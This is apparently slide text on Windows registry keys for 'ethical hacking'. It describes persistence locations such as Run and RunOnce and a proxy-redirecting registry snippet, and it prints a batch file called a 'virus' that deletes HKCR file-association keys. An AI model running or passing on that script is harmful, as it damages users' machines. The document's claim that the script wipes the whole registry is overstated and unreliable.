Windows Registry For Ethical Hacking
Windows Registry For Ethical Hacking
RecentDocs Key
If you suspect that your computer has been breached, the first thing
that you would want to know is if an unauthorized user has accessed
any of your sensitive files. You can find that out by accessing this
location:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\RecentDocs
VULNERABILITIES
THE RUN REGISTRY KEY:
The most-used location for hackers is this:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run
This Registry key can be used to ensure a malicious software such as
key-loggers, spyware or even a rootkit runs at startup
VULNERABILITIES
THE RUN-ONCE REGISTRY KEY:
If you suspect that a file that only needs to run once during startup
infects your computer, you would most likely find the suspected file
here:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunOnce
VULNERABILITIES
STARTUP SERVICES:
This key can be used to disable certain security features within the
Windows Operating System, thereby making the computer vulnerable to
other attacks.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
VULNERABILITIES
DISABLE NETWORK CONNECTIVITY:
Network Connectivity can be disabled using the following code. It changes the computer’s
proxy setting to a local server, thereby sending all traffic to it.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Connections]
"WinHttpSettings"=hex:18,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,\
00
"DefaultConnectionSettings"=hex:
"SavedLegacySettings"=hex:
VULNERABILITIES
A VIRUS THAT DELETES THE REGISTRY FILE:
A notepad file can be opened that enters the following code:
@ECHO OFF
START reg delete HKCR\.exe
START reg delete HKCR\.dll
START reg delete HKCR\*
the above code, when saved as an executable .bat file will delete the entire
Windows Registry file, thereby rendering the computer unusable. The only
solution would be to re-install the OS.
VULNERABILITIES
A VIRUS THAT DELETES THE REGISTRY FILE:
VULNERABILITIES
CREATING A REGISTRY DUMP FOR RECONNAISSANCE:
The following code creates a text file containing ALL settings and preferences,
software behaviour, logs, recent documents, all computer actions, recently typed
URLs, and much more, which can be remotely sent to an attacker.